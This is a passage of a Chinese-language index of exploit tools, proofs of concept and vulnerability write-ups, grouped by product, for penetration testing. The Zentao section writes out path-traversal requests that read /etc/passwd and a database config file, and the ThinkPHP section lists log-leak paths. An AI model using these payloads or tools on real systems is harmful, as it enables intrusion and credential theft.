[Spring扫描器](https://github.com/0xsp-SRD/OffensivePascal/tree/main/SpringCore-Scanner)
[HeapDump敏感信息提取工具](https://github.com/whwlsfb/JDumpSpider)
[基于springboot和spring security的Java web常见漏洞及安全代码](https://github.com/JoyChou93/java-sec-code)
[SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit)
## Struts2
[Struts2全漏洞扫描利用工具](https://github.com/HatBoy/Struts2-Scan)
[Struts漏洞源码](https://github.com/xhycccc/Struts2-Vuln-Demo)
[S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE](https://github.com/Wrin9/CVE-2021-31805)
[远程代码执行S2-062 CVE-2021-31805验证POC](https://github.com/YanMu2020/s2-062)
[Python2编写的struts2漏洞全版本检测和利用工具](https://github.com/Lucifer1993/struts-scan)
[Struts2 系列漏洞检查工具](https://github.com/shack2/Struts2VulsTools)
[Golang 版 Struts2 漏洞扫描利用工具](https://github.com/x51/STS2G)
[struts2绕过waf读写文件及另类方式执行命令](https://f0ng.github.io/2022/04/14/struts2绕过waf读写文件及另类方式执行命令/)
[Struts2漏洞扫描 Burp插件](https://github.com/novysodope/ST2Scanner)
[一款检测Struts2 RCE漏洞的burp被动扫描插件,仅检测url后缀为.do以及.action的数据包](https://github.com/x1a0t/Struts2Burp)
## ThinkAdmin
[ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现](https://blog.csdn.net/Adminxe/article/details/108744912)
[thinkAdmin框架0day](https://mp.weixin.qq.com/s?__biz=Mzg3NTk4MzY0MA==&mid=2247485677&idx=1&sn=3c2ae67b8958a0325701139210dd58e8)
## ThinkCMF
[ThinkCMF 任意内容包含getshell漏洞](https://www.hacking8.com/bug-web/ThinkCMF/ThinkCMF-框架上的任意内容包含漏洞.html)
[jas502n/ThinkCMF_getshell](https://github.com/jas502n/ThinkCMF_getshell)
## Thinkphp
[实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露](https://mp.weixin.qq.com/s/B9jkF0e0SMTJ6r09Syy-8A)
[thinkphp5 mysql账号密码泄露漏洞](https://mp.weixin.qq.com/s/R11Ha6ksbd7kslAuhyy73Q)
[ThinkPHP使用不当可能造成敏感信息泄露](https://blog.csdn.net/Fly_hps/article/details/81201904)
[https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ](https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ)
日志泄露
```
/Application/Runtime/Logs/Home/16_09_06.log # 其中 Application 可能会变,比如 App
/Runtime/Logs/Home/16_09_06.log # 年份_月份_日期
/Runtime/Logs/User/16_09_06.log # 年份_月份_日期
```
[ThinkphpGUI](https://github.com/Lotus6/ThinkphpGUI)
[thinkphp6 session 任意文件创建漏洞复现 含POC](https://mp.weixin.qq.com/s/8k96KSpWMk7S4-_TzweXxg)
[一键 ThinkPHP 漏洞检测](https://github.com/Lucifer1993/TPscan)
[ thinkphp5 rce 漏洞检测工具](https://github.com/theLSA/tp5-getshell)
[-Thinkphp rce 扫描脚本,附带日志扫描](https://github.com/sukabuliet/ThinkphpRCE)
[tangxiaofeng7/TPScan](https://github.com/tangxiaofeng7/TPScan)
[ThinkPHP 漏洞 综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含, 宝塔绕过](https://github.com/bewhale/thinkphp_gui_tools) -
## Tomcat
[拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马](https://github.com/ce-automne/TomcatMemShell)
[Apache Tomcat JMXProxy RCE](https://github.com/4ra1n/tomcat-jmxproxy-rce-exp)
[CVE-2022-26377:使用proxy_ajp对 Tomcat AJP 进行反向代理,可构造 AJP 数据包攻击后端服务](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)
[CVE-2022-29885:Apache Tomcat 集群服务Listener中的拒绝服务漏洞](https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/)
[用于扫描 Apache Tomcat 服务器漏洞的 python 脚本。](https://github.com/p0dalirius/ApacheTomcatScanner)
## TP-Link
[CVE-2022-25064 TP-LINK TL-WR840N RCE](https://github.com/Mr-xn/CVE-2022-25064)
## Ueditor
[百度Ueditor编辑器漏洞总结](https://mp.weixin.qq.com/s/mH4GWTVoCel4KHva-I4Elw)
[UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率](https://jianfensec.com/渗透测试/UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率/)
[九维团队-绿队(改进)| Java代码审计之SSRF](https://mp.weixin.qq.com/s/bF7wJpbN4BmvT8viWGW7hw)
[当ueditor遇到某盾](https://mp.weixin.qq.com/s/Lf3lMzlpBq7Vq5nDf_pUcw)
[Ueditor编辑器漏洞(文件上传)](https://www.jianshu.com/p/681162ed0374)
[theLSA/ueditor-getshell](https://github.com/theLSA/ueditor-getshell)
## Vmware
[CVE-2021-21974 VMWare ESXi RCE Exploit](https://github.com/Shadow0ps/CVE-2021-21974)
[CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)
[利用 VMWare Horizon 中的 CVE-2021-44228 进行远程代码执行等](https://github.com/puzzlepeaches/Log4jHorizon)
[SharpSphere](https://github.com/JamesCooteUK/SharpSphere)
[VMWare vRealize SSRF-CVE-2021-21975](https://github.com/Henry4E36/VMWare-vRealize-SSRF)
[Vmware vhost password decrypt](https://github.com/shmilylty/vhost_password_decrypt)
[CVE-2022-22972 的 POC 影响 VMware Workspace ONE、vIDM 和 vRealize Automation 7.6。](https://github.com/horizon3ai/CVE-2022-22972)
[.NET 攻击 vCenter 项目](https://github.com/JamesCooteUK/SharpSphere)
[从 vCenter 备份中提取 IdP 证书并以管理员身份登录的工具](https://github.com/horizon3ai/vcenter_saml_login)
[Vcenter Server CVE-2021-21985 RCE PAYLOAD](https://iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/)
[CVE-2021-21985 (Vulnerable Code)](https://github.com/alt3kx/CVE-2021-21985_PoC)
[VMware vCenter漏洞实战利用总结](https://www.ctfiot.com/39518.html)
[Vcenter实战利用方式总结](https://forum.butian.net/share/1893)
## VMware VRealize Network Insight
[VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)](https://github.com/sinsinology/CVE-2023-20887)
## Weblogic
[weblogic t3 deserialization rce](https://github.com/5up3rc/weblogic_cmd)
[适用于weblogic和Tomcat的无文件的内存马](https://github.com/keven1z/weblogic_memshell)
[Weblogic漏洞检测](https://github.com/0nise/weblogic-framework)
[CVE-2018-3245-PoC](https://github.com/pyn3rd/CVE-2018-3245)
[Weblogic一键漏洞检测工具,V1.5,更新时间:20200730](https://github.com/rabbitmask/WeblogicScan)
[About
WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)](https://github.com/KimJun1010/WeblogicTool)
[CVE-2020-14882&CVE-2020-14883 Weblogic未授权远程命令执行漏洞](https://www.cnblogs.com/liliyuanshangcao/p/13962160.html)
## Webmin
[KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc)
[vulhub/webmin/CVE-2019-15107/README.zh-cn.md](https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md)
[jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)
## Websphere
[IBM Websphere Portal - Persistent Cross-Site Scripting](https://www.exploit-db.com/exploits/36941)
[websphere_rce.py](https://github.com/Coalfire-Research/java-deserialization-exploits/blob/master/WebSphere/websphere_rce.py)
[websphereCVE-2015-7450](http://www.zstreamer.cn/2020/07/19/websphere-cve-2015-7450/)
[Websphere ND远程命令执行分析以及构造RpcServerDispatcher Payload(CVE-2019-4279)](https://xz.aliyun.com/t/6394)
[WebSphere XXE 漏洞分析(CVE-2020-4643)](https://paper.seebug.org/1342/)
[Turning bad SSRF to good SSRF: Websphere Portal](https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/)
## Wso2
[WSO2 RCE (CVE-2022-29464) 漏洞利用](https://github.com/hakivvi/CVE-2022-29464)
## XXL-JOB
[XXL-JOB 默认 accessToken 身份绕过漏洞](https://blog.csdn.net/qq_41904294/article/details/134201486)
[XXL-JOB 深度利用](https://mp.weixin.qq.com/s?__biz=MzkyNzYxMDQ2MQ==&mid=2247483934&idx=1&sn=2de580591b3a2a850560ffa6e62b4d01)
## Yii
[CVE-2020-15148 Yii2反序列化RCE POP链分析](https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA)
[Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses)
## Zabbix
[Zabbix Saml Bypass](https://github.com/Henry4E36/zabbix-saml-bypass)
[zabbix latest.php SQL注入漏洞 (CVE-2016-10134)](https://vulhub.org/#/environments/zabbix/CVE-2016-10134/)
[Zabbix sql注入漏洞复现(CVE-2016-10134)](https://mp.weixin.qq.com/s/Gi3NMbZcgMutE8mNqCmNAw)
[CVE-2020-11800 zabbix RCE漏洞细节披露](https://xz.aliyun.com/t/8991)
[CVE-2021-27927: Zabbix-CSRF-to-RCE](https://mp.weixin.qq.com/s/eyVwNKRfWpSGNA7Gq8KpWA)
[CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞分析与复现](https://mp.weixin.qq.com/s/-TAUjvdigi9TzjoPpMe1kw)
[Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131)
[CVE-2022-23134 Zabbix漏洞分析之二:从未授权访问到接管后台](https://mp.weixin.qq.com/s/jq2AvDlHCosb3zViPXGTaQ)
## Zentao
CNVD-2020-65242 后台任意文件下载
```
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file
```
后台 im 模块 downloadXxdPackage 函数任意文件下载
```
index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd
```
[Zentao v16.5 SQL Injection POC](https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go)
[禅道12.4.2后台管理员权限Getshell复现](https://mp.weixin.qq.com/s/Uak631OOC48WcshaYnvsRQ)